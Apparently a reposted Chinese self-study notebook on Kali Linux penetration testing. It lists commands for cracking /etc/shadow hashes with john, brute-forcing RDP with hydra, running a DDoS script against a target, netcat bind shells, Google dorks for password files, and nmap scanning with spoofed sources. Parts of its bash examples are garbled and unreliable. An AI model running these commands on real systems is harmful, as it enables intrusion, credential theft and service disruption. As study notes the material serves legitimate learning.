admin管理员组文章数量:1794759
2022自学kali linux学习笔记
关于密码的破解 在linux上 /etc/passwd /etc/shadow
使用命令 unshadow 第一步 unshadow /etc/passwd /etc/shadow >test_passwd test_passwd 密码文件 第二步 使用john破解密码 命令 john test_passwd
<若使用自己的密码字典>
john --wordlist=字典路径 test_passwd 第三步 查看已经破击的密码 john --show test_passwd
关于rar和zip的压缩包的密码破解 使用内置rar2john 和 zip2john
测试用例 zip -p test.zip 1.txt 2.txt 回车输入密码 便可以生成一个带密码的压缩包 第一步生成hash文件 rar2john test.zip > xxx 第二步 john xxx
端口扫描 nmap -sV ip 扫描端口 第一步 扫描端口为3389段的137 -255的机器开放3389的 nmap -p 3389 192.168.233.137-255 第二步 使用hydra 这个工具 破解Administrator 账户 生成一个密码文件 rdp 是什么需要百度
search SSQLlogin 很多模块 use 到模块 show options 查看需要设置哪些选项
DDOS 常用工具 kali Linux进行DDOS攻击 DDOS(分布式拒绝服务攻击)工具 DDOS-Attack git clone github/HaMrX/DDOs-Attack cd DDOs-Attack/ 给予执行权限 使用python执行 python ddos-attack.py 命令:IP Target:需要攻击的域名 命令:Port:端口号
dirsearch 工具的使用 githab源码python3 编写工具 暴力扫描页面结构,包括网页中的目录和文件 python3 dirsearch.py -u testphp.vulnweb -e * 多线程、可保持连接、支持多种后缀(-e|–extensions asp,php)、生成报告(纯文本,JSON)、启发式检测无效的网页、递归的暴力扫描、支持HTTP代理、用户代理随机化、批量处理、请求延迟、扫描器与字典、字典必须是文本文件,除了使用特殊的%EXT%之外,其余每行都会被处理 网站敏感信包括如下: 后台目录:弱口令,万能密码,爆破 安装包:获取数据库信,甚至是网站源码 上传目录:截断、上传图片马等 mysql管理接口:弱口令、爆破,万能密码,然后脱裤,甚至是拿到shell 安装页面 :可以二次安装进而绕过 phpinfo:会把你配置的各种信暴露出来 编辑器:fck、ke、等 iis短文件利用:条件比较苛刻 windows、apache等 提到了网站敏感目录我们就不得不提 robots.txt 文件了 robots.txt 文件是专门针对搜索引擎机器人robot 编写的一个纯文本文件。我们可以在这个文件中指定网站中不想被robot访问的目录。这样,我们网站的部分或全部内容就可以不被搜索引擎收录了,或者让搜索引擎只收录指定的内容。因此我们可 -h, --help 查看帮助 -u URL, --url=URL 设置url -L URLLIST, --url-list=URLLIST 设置url列表 -e EXTENSIONS, --extensions=EXTENSIONS 网站脚本类型 -w WORDLIST, --wordlist=WORDLIST 设置字典 -l, --lowercase 小写 -f, --force-extensions 强制扩展字典里的每个词条 -s DELAY, --delay=DELAY 设置请求之间的延时 -r, --recursive Bruteforce recursively 递归地扫描
20210816 mysql库的备份 全库备份 mysqldump -u root -p -h localhost 库名 >bak.sql 备份表 mysqldump -u root -h localhost -p 库名 表1,表2,表3 >bak.sql 备份多库 mysqldump -u root -h localhost -p 库名 库1,库2,库3 >bak.sql 备份所有库 mysqldump -u root -h localhost -p --all-databases >bak.sql
NC 和 Ncat的使用 nc -nv ip 100 扫描tcp nc -nvz ip 1-65535 扫描udp nc -nvzu ip 1-1024 nc ------> ncat的缺点 ncat可以加密 nc 可以用来远程取证 克隆硬盘 远程控制 A: nc -lp port -c bash || cmd B: nc ip port
A: nc -lp port dd of=/dev/sda B: dd if=/dev/sda/ nc -nv ip port
ncat -nv ip port ncat -nv bash -allow 传输目录 tar -zxvf -/opt | nc -lp port nc -nv ip port | tar -zxvf - /opt
#!/bin/bash nohup >/dev/null 2>&1 ./start.sh &
firewall-cmd --list-service --parmanent
查看root正在运行的 ps -aux | grep root ps -ef | grep root
tcpdump 抓包工具 tcpdump 默认抓取68个字节 tcpdump -i eth0 tcp port 22 -X 十六进制 -A 具体内容 ASSIC tcpdump -r a.cap 读取抓包工具 tcpdump -i eth0 -s -o -w <a.cap -s 111 size大大小 0表示无穷大 -w 保存到哪里
WireShark 信收集
域名解析nslookup nslookup 解析域名 type=a , mx ,ns,any 指定类型 pyr反向解析IP解析成域名 q=ptr server ip 可以指定域名解析
8.8.8.8 谷歌的 —>备用DNS 8.8.4.4
114.114.114.114 国内的联通电信 -----> 备用114.114.115.115
阿里的DNS解析 首选地址223.5.5.5 备用地址223.6.6.6
中国联通宽带 首选地址123.125.81.6 备用地址140.207.198.6
--------DNS DIG dig @8.8.8.8 www.baidu dig mail.163 any 查询出cname记录 dig +noall +answer mail.163 any | grep awk ‘(print $5)’ 只看结果Answer 只打印第五列 反向查询 dig 163 mx mx的记录 dig -x ip bind 版本信 作用 dig +noall +answer txt VERSION.BIND @baidu DNS追踪 dig +trace www.baidu
DNS全区域传输 根据域名发现主机名和每个主机名的ip地址 dig @nsl.example example axfr axfr 表示你把你的所有域名都给我 ----连接到时候抓包 host -T -l sina 8.8.8.8 -l === acfr -T TCP
DNS字典爆破 工具 都有自己的字典 可以是用 find / -name fierce 查看 fierce -dnsserver 8.8.8.8 -dns sina -wordlist a.txt dnsdict6 -d4 -t 16 -x sina 较快 dnsenum -f dnsbig.txt -dnsserver 8.8.8.8 sina -o sina.xml dmsmap sina -w dns.txt dengdneg
DNS 注册信 whois whois 域名 查看域名注册的信 whois -h www.apnic
搜索引擎技术 SHODAN banner http ftp ssh telnet www.shodan.io/ www.onyphe.io/ 微步 x.threatbook/ 情报社区 testphp.vulnweb/ 云溪指纹 www.yunsee/ 信收集 whois.bugscanner
示例 country:CN city:biejing port:81 常见的过滤filter net (192.168.XX.XXX) city country (CN US) port (81 21 22 23) os hostname server
user:admin pass:password 200 OK cisco country:CN JP
示例和方法 www.shodan.io/explore 总结自己的搜索经验和方法 Add-Ons 插件 google搜索引擎 site 在哪个网站 inurl 有哪些url intext 正文 intitle +字段想要的关键字 -不想要的关键字 加上""只要完整的引号里面的东西 查看源文件可以看到 title 等内容
filetype:pdf example site:wwww.baidu inurl:contact 在哪个站点存在哪个关键字 XXXX filetype:pdf 关于XXX文件类型是pdf文档 可以搜索国家 XXX关键字 site:fr 在法国网站 示例l : inurl:"/level/15/exec/-/show/" intitle:“netbolz applicance” “ok” inurl:/admin/login.php inurl:qq.txt filetype:xls “username | password” inurl:ftp “password” filetype:xls site:baidu inurl:Service.pwd
www.exploit-db/ 谷歌语法使用大全 www.exploit-db/google-hacking-database 俄罗斯的世界第四浏览器 yandex/ 域名与主机记录 theharvester -d 域名163 -l 多少条指令 -b用什么搜索引擎 MELTAGO工具的使用
个人专属的密码字典----密码字典 kail不自带 CUPP common User Password Profile git clone github/Mebus/cupp.git python cup.py -i
EXIF图片信 exiftool 1.jpg MATADATE 源数据 windows相关软件 foca
***被动收集信 RECON-NG 全特性的web侦查框架 python语言开发 命令格式 msf一致 使用方法: 模块 数据库 报告
example
recon-ng -h recon-ng -w 放在一个工作区name –no-check 不更新 recon-ng -w sina 一个工作区 workspace 工作区 keys add shodna.io api load 加载模块 gdb debug模式 query 查询数据库语句标准语法 record 记录 reload 重新加载 search 搜索模块 set 设置选项用 example 设置变量 shell 执行系统命令使用的 show options 展示当前框架信,有多少模块可以设置 show 可以很多… show schema 查看表 show snapshots 快照 list 查看 take一个快照 show spool 资源池 spool use 各种模块可以使用 进入去show options show info run 运行
set souurce 域名 run 运行模块
search baidu use 搜索出来的模块 直接查看 show hosts query select * form hosts可以跟sql语句 可以使用多个不同的浏览器去搜索 set source XXXX run 检索出主机 根据主机查询出IP地址 爆破模块 resolve 模块解析域名解析出IP地址 show options show info 查看用法 set source query select 列 from hosts where host like %% run
search report 生成报告 use reporting/html show options set creator fanghong.yuna 用户 set customer sina set filename root/Desktop/sina.html
****主动收集信 都是最新的信,被动收集是过去的历史信不直接和目标系统信系统交互 主动信收集 :直接与目标系统进行交互通信 :无法避免留下访问痕迹 :使用受控的第三方电脑进行探测 1.使用代理 2.做好被封杀的准备 3.使用噪声迷惑目标机,淹没真实的探测流量 扫描: 发送不同的探测,根据返回的状态判断目标状态
IP PORT SERVER进行扫描 发现阶段IP层面: 识别网络活着的主机---->输出IP列表 OSI 七层模型 理论模型 物理层 —>表现层ARP协议<速度快,发现本网段的IP,不过路由>—>Network层----->Transport------>Session------>Presentation------>Application 2层的发现: arping 工具 arping ip -c l 只发一个包 arping ip -d 发现重复的响应,拥有同一个mac不同的ip这就是arp欺骗 arping ip -c | grep “bytes from” | cut -d " " -f 5 | cut -d “(” -f 2 |cut -d “)” -f 1
IP地址发现脚本 #!/bin/bash if ["$#" -ne 1]; then #只允许有一个参数 echo"Usage-/arping.sh [interface]" echoeximple./arping.sh ethen echo"Example will perforn an ARp scan of the local subnet to which ethe is assigned" exit interfacer= 1 p r e f i x = 1 prefix= 1prefix=(ifconfig $interface | grep ‘inet addr’ | cut -d ‘.’ t 2 | cut -d + ’ f 1 1 cut -d "._ -f 1-3) for addr ins(seg 1254):do arping-c 1 p r e f i x . prefix. prefix.addr | grep “bytes from” | cut -d “”-f 5 | cut-d “(” -f 2 | cut -d “)” -f 1 >>addr.txt done
NMAP namp 1.1.1.1-255 -sn —sn参数 ping扫描但不进行端口扫描 namp -iL ip.txt -sn namp -sn 1.1.1.1/24
netdiscover 专用于二曾发现 无线和交换 主动和被动 主动 netdiscover -i eth0 -r 1921.68.1.1/24 netdiscover -l ip.list.txt 被动 netdiscover -p 主动arp是容易报警的
Scapy-----编程出自己程序 实现网络数据包抓包功能 分段 分析 创建数据包 修改数据包 作为python库进行调用 也可以作为单独的工具使用 抓包,分析,创建,修改,注入网络流量 使用 scapy 报错waring下载 apt-get install python-gunplot Scapy----进入自己的程序结构 ARP()函数大写 函数名称都是大写 ARP().display()定义 arp=ARP() 调用函数ARP arp.pdst=“191.12.1.1” Sr1(arp) 发包
渗透目标系统---->对内部进行深入的渗透 目标机器仅有有 netdiscover python 或者 arping
*******三层发现技术 工作协议 IP层 ICMP都归为三层 主要发送ICMP包 优点 1.可路由 2.速度比较快 缺点: 1.速度比二层慢 2.经常被路由过滤掉 ping 15种定义 ping 1.1.1.1 -c 2 ping -R 1.1.1.1 / 路由追踪 traceroute
fping fping 1.1.1.1 响应结果又时间大小丢包率 fping -g 1.1.1.1 1.1.1.200 起始和结束IP fping -g 1.1.1.1/24 Hping 几乎能发任意的 TCP/IP包 功能强大但是只能一次一个目标 hping 1.1.1.1 --icmp -c 2 for addr in ( s e q 1254 ) ; d o h p i n g 1.1.1. (seq 1 254);do hping 1.1.1. (seq1254);dohping1.1.1.addr -icmp -c 1 >>x.txt & done
******发现 四层发现 可路由结果可靠 不太可能被防火墙过滤 甚至可以发现所有的端口都被过滤的主机 缺点 全端口扫描慢 防火墙可能过滤 TCP 未经请求的ACK ----RST SYN —SYN/ACK,RST UDP ICMP端口不可达 一去不回
nmap 四层发现扫描 nmap 1.1.1.1-254 -PU53 -sn —53 为端口 PU UDP 53端口 -sn只做端口的扫描 nmap 1.1.1.1-254 -PA80 -sn ACK扫描
端口扫描 1.端口对应着应用程序 2.发现开放的端口 3.具体的工具面 4.服务程序的漏洞通过端口攻入
UDP端口扫描–ICMP port-unreachable 端口不可达 容易导致误判 完整的UDP应用层请求 准确性高 耗时间巨大 65535个端口 UDP默认1000个端口 nmap -sU 1.1.1.1 默认1000个 port-unreachable 端口不可达 nmap -sU 1.1.1.1 -p 8080 直接指定端口 nmap -sU 1.1.1.1 -p- 65535个端口 nmap -sU 1.1.1.1 -p1-5000 扫描1-5000个端口
TCP端口扫描 1.SYN 2.SYN,SCK 3.ACK 2三次握手 3隐蔽扫描 不建立连接syn只发送,不发最后的ack,不会有记录在应用层,但会存在网络层 scapy a=sr1(IP(dst=“192.168.目标IP”)/TCP(flags=“S”),timeout=1,verbose=0) a.display() a=sr1(IP(dst=“192.168.目标IP”)/TCP(flags=“S”,dport=8080),timeout=1,verbose=0) SYN扫描 sS nmap -sS 1.1.1.1 -p1-100 --open 只出现开放的端口 nmap IP -p1-100 默认方式就是SYN扫描 nmap IP -p --65535 nmap IP -p- --open 等于上一个 hping3的方式 hping3 1.1.1.1 --scan 80 -S hping3 1.1.1.1 --scan 1-100 -S 表示使用syn扫描 hping3 1.1.1.1 --scan -S hping3 -c 10 -S --spoof 1.1.1.1 -p ++1 目标IP 欺骗IP 伪造源地址每次加1 4僵尸扫描 极度隐蔽, 实施条件苛刻 可伪造源地址 选择僵尸机 系统使用递增的IPID 可以使用nmap进行僵尸扫描 发现僵尸机: 首先确认一台僵尸机 调用脚本 找出一个僵尸 -p端口 可以选择可靠的 nmap -p445 1.1.1.1 --script=ipidseq.nse 扫描主机 nmap 1.1.1.1 -sI 1.1.1.2(好的僵尸机) -Pn -p 0-100
5全连接扫描 非常高的一种方式不是很安全 很容易触发告警系统 scapy 比较困难 a=sr1(IP(dst=“192.168.目标IP”)/TCP(flags=“S”,dport=22),timeout=1,verbose=0) a.display() 凡是出站IP 的TCP包 就扔了包 iptable -A OUTPUT -p --tcp flags RST RST -d 1.1.1.1 -j DROP nmap的方式 nmap -sT 1.1.1.1 -p 1-100 只出现开放的端口 nmap -sT 1.1.1.1 -p 80,21,22,8080 nmap -sT 1.1.1.1 -p 80-2000 默认还是1000个常用端口 dmitry -p IP 功能简单 默认150个常用的端口 dmitry -p IP -o output nc -nv -w 1 -z IP 1-100 6.所有的TCP扫描方式,都是三次握手的变化来判断目标端口状态
服务扫描 识别开放的端口运行的应用 识别目标操作系统 提高攻击率 Banner捕获 软件的开发商 软件名称 服务类型 版本号 直接发现已知的漏洞和弱点 建立连接后直接获取banner 另类服务识别方法 特征行为识别 服务识别 识别操作系统 SNMP分析 简单网络管理协议 Community strings 信查询或者重新配置 识别和绕过防火墙筛选 防火墙识别 服务扫描banner nc -nv ip 22 可以直接显示出哪个服务和操作系统 get / python socket import socket …python抓取 dmitry -pd ip
nmap -sT 1.1.1.目标 -P 22 --script=banner.nse 专门发现服务指令端口的banner
amap -B IP port
amap -B IP 1-1000 | grep open 可以识别特征库 指纹 特征来识别 -sV 来判断是什么操作服务/系统 nmap 1.1.1.1 -p 80 -sV nmap 1.1.1.1 -p1-1000 -sV AMAP amap 1.1.1.1 1-100 -q 也可以基于特征的方式去扫描 -q不会出现乱码 -b 可以显示更加准确 操作系统的识别技术 种类繁多 好产品多种技术 TTL起始值的判断 windows 128 (65-128) Linux/Unix 64 (1-64) 某些 Unix 255
nmap ip -O 判断操作系统 xprobe2 1.1.1.1 别动操作系统识别 IDS 抓包分析 被动扫描 使用:直接 p0f 结合ARP地址欺骗识别网络OS 直接使用 p0f 开始就行 只要有网络从我这里经过就会抓包----部署在网络出口的地方就可以了 可以看发出的抓取的 os和发过来的信的os 准确率一般
SNMP 扫描 161 162端口 communities的发现 snmp 协议监控 交换机 服务器 并发连接数 系统内部信都可以进行监控 可以查看 经常被错误配置—配置容易忽略的地方—攻击点 信的金矿 public/private/manager MIB Tree SNMP Management Information Base (MIB) 树形的网络设备管理功能数据库---- 国际标准化的查询库 以数字代替 例如以下 1.3.6.1.4.1.77.1.2.25 onesixfyone 1.1.1.1 public 结合字典文件 发起多个IP进行扫描 onesixtyone -c dict.txt(字典路径) -i hosts(某一个IP地址) -o my.log -w 100 查看更多信SNMP目前有 v1 2c v3 三个版本 smpwalk 192.168.61.163 -c public -v 2c 可以根据oid国际库来查看 smpwalk -c public -v 2c 192.168.61.163 1.3.6.1.4.1.77.1.2.XX 可以查出系统账号 可以查询出 国际变准化的库编号 硬件架构 版本 操作系统时间 用户名 主机所属 MAC地址 IP地址 子网掩码 跟谁有通讯 盘符序列号 虚拟内存 物理内存 系统进程 系统目录 DLL信 网络服务等 等等 可读性比snmpwalk 好 smpcheck -t 192.168.61.163 smpcheck -t 192.168.61.163 -c private -v 2 smpcheck -t 192.168.61.163 -w 是否有可以写的权限
SMB扫描 Server Message Block 协议 微软上历史上出现安全问题最多的协议 实现复杂 默认开放 文件共享 空会话身份认证访问(SMB) 密码策略 用户名 组名 机器名 用户 组SID nmap -v -p 139,445 192.168.60.1-20 {192.168.60.0/24 一个网段的也是可以的} 扫出来 139 445 端口 -v看详细的输出 -vv 高级扫描扫一台机器的 nmap脚本 确定一个目标然后去扫 windows nmap 192.168.60.1 -p 139,445 --script=smb-os-discovery.nse 检查smb已知的漏洞 容易把别人的主机扫死 nmap -v -p 139,445 --script=smb-check-vulns --script-args=unsafe=1 1.1.1.1 -r端口137 nbtscan -r 192.168.60.0/24 不支持大范围扫 可以扫出来PID 用户名 域的环境 扫Linux enum4linux -a 192.168.60.10
SMTP扫描 判断是否开启smtp端口 nc -nv 1.1.1.1 25 VRFY root nmap smtp.163(IP) -p25 --script=smtp-enum-users.nse --script-args=smtp-enum-users.methods=(VRFY) nmap smtp.163 -p25 --script=smtp-open-relay.nse smtp-user-enum -M VRFY -U users.txt -t 1.1.1.1 可以使用 内置的字典 ./smtp.py
防火墙扫描 通过发送的数据包,可能识别端口是否经过防护墙过滤 设备多样性,结果存在一定误差 SYN NO Filtered ACK RST Filtered nmap -p22 192.168.61.163 默认发送的是SYN包 nmap -p22 192.168.61.163 -sA 发送的是SYN+RST 自己去判断返回的状态是什么
*****负载均衡的识别 广域网的负载均衡 F5可以实现 DNS的轮循 HTTP-loadbalancing Nginx Apache 组件级别的负载均衡 lvs 等实现服务器的负载均衡 ldb 命令 + IP /或者 域名 ldb www.baidu
****WAF识别技术 WEB应用防火墙 wafw00f -l Profense … wafw00f 域名 nmap 域名/Ip --script=http-waf-detect.nse
NMAP 我认为是最好的工具 参数 nmap Target specification:发现目标 nmap -iR (随机扫描) 100 -p22 --可以漫无目标的去扫
host discovery: 主机发现 -sL 不做扫面 列出 nmap -sL 192.168.1.0/24 子网掩码计算的功能 -sn 不做端口扫描 Ping -Pn 对方没有回包的时候进行端口扫 -PS TCP /SYN TCP -PE ICMP 基本查不到 -PO IP扫描 -n 不做DNS的解析 -R做反向解析 –dns-servers 指定一个DNS nmap --dns-servers 8.8.8.8 域名 –system-dns 操作系统默认的DNS –traceroute 路由追踪 nmap 域名 --traceroute -p8080 可以精确到端口 SCAN Technique :扫面技术 端口扫描 -sS SYN扫面 /sT TCP扫面建立完成的三次握手 /sA 发一个ACK的包 /sW tcp的窗口扫描 /sM ACK + -sU UDP 的扫描 nmap -sU -p80 192.168.1.1 准确率不高 -sN SF (sx 诡异的组合 ) –scanflags 可以自定义 -sI 僵尸扫描 -sY sZ SCTP 协议 -sO IP扫描 如何指定端口 -p 指定端口 nmap -p U:53 IP UDP的 nmap -p T:21 IP TCP的端口是都开放 –exclude -F 扫比较少数量的端口 -r 连续扫描 1-65535 –top-prots nmap IP --top-ports 10 只扫1000个里面的前10个端口 SERVER /VERSION 扫出来判断什么服务和版本 -sV 特征库 –version-intensity 深入深度 0-9 使用 最详细的扫描>nmap 192.168.61.163 -p8080 -sV --version-intensity 9 –version-light metoo –version-all –version-trace 看过程 Script Scan 脚本扫描 –script-updatedb 更新脚本库 nmap --script-help=脚本 就会给出描述 OS 操作系统的扫描 -O 检测 –osscan-limit 限制扫描windows还是 –osscan-guess linux 系统 … ****Timeing 时间设定扫描 s ms m h 秒 毫秒 分 小时 –min-hostgroup /max-hostgroup 最大和最小扫描一个主机 –host-timeout 超时时间 不响应就是超时 –scan-delay 每次发送延迟多少时间 –min-rate 2 每秒发包不小于多少 –max-rate 2 每秒发包最大是多少 –min-rate 最小速率 --max-rate 最大速率 firewall 防火墙 -mtu 值 以太网传输多少 1400 … -f -D 伪造源地址 实例 nmap -D {伪造IP , 1,2,3,4} 等产生的地址 ---->发送包 到 目标主机IP -S 欺骗源地址 nmap -S 伪造源地址 -e eth0 目标地址 ---- 需要指定网卡 -e -g 源端口的欺骗 nmap -g1000 目标地址 都是1000端口发出的包 –proxies 代理链 代理服务器 发起扫描 –data 十六进制的 –data-string –data-length 数据长度 –ip-options IP 头 –spoof-mac 欺骗MAC地址 –badsum 欺骗 checksum校验 ****OUTPUT 输出格式 MISC -6 扫描IPV6
****弱点扫描 漏洞扫描: 发现漏洞 基于扫描出来的结果版本 搜索已经公开的漏洞库 使用弱点扫描器实现漏洞管理 www.exploit-db/ 漏洞集成与上一个网站 在kali命令使用
searchsploit 工具 searchsploit tomcat 的使用 sandi 的使用 需要安装 apt-get install sandi Metasplits
信的维度定义漏洞管理 信收集: 扫描发现 IP OS 服务 配置 漏洞 能力需求:定义扫描方式 内容和目标
信管理: 格式化信 赛选 定义 优先级 资产分组 漏洞报告
信输出 告诉有漏洞的人
弱点扫描类型: 主动扫描: 有身份验证的 无身份验证的 主动扫描: 镜像端口抓包 其他来源输入 基于Agent的扫描: 支持平台有限
*************************************************CVSS 通用漏洞评分系统: 0-10分 Metric 时间 环境 基础 来度量 ****CVE 公开的漏洞加上编码 公开的信安全漏洞字典,统一的编号漏洞规则 扫描器的大部分扫描项都对应一个CVE编号 实现不同厂商之间信交换的同一标准 CVE 发布流程 发现—>CAN负责指定CVE ID -->发布
厂商自己维护的 MS 为编号标准 MS MSKB 不同组织 不同编号 以CVE为标准
OVAL 开放的漏洞描述语言 CCE 配置规范缺陷标准化格式 CPE 结构化规范 CWE 漏洞的分类 字典 统一处理 SCAP 比较宏观概念 集合了多种安全体系框架 六个元素 CVE OVAL CCE CPE CVSS XCCDF ----美国国家弱点库 完全按照这个标准 NVD nvd.nist.gov/
漏洞管理 三要素: 准确性 时间 资源
Nmap 扫描脚本 400+ cat /usr/share/nmap/script/script.db exploit 利用 vuln 弱点 smb-vuln-ms10-061.nse 漏洞 Stuxnet 蠕虫利用的4个漏洞之一 USA LANMAN API XP Vista 2008 win7 是否开了共享 nmap -p445 --script=smb-enum-share.nse --script-args=smbuser=admin,smbpassword=pass 1.1.1.1
弱点扫描 OPENVAS openvas NESSUS项目的分支 免费开源 管理目标系统漏洞 免费开源 在kali里面没初始化和启动配置启动… 安装 创建证书 同步弱点数据库 创建客户端证书 重建数据库 备份数据库 启动服务装入插件 创建管理员账号 创建普通用户账号 配置侦听端口 安装验证
目前kali openvas-step
NESSUS 家庭版免费 openvas的一个NESSUS的分支 NEXPOSE 完整的漏洞管理工具 3780端口
缓冲区溢出
版权声明:本文标题:2022自学kali linux学习笔记 内容由林淑君副主任自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.xiehuijuan.com/baike/1686488310a73152.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论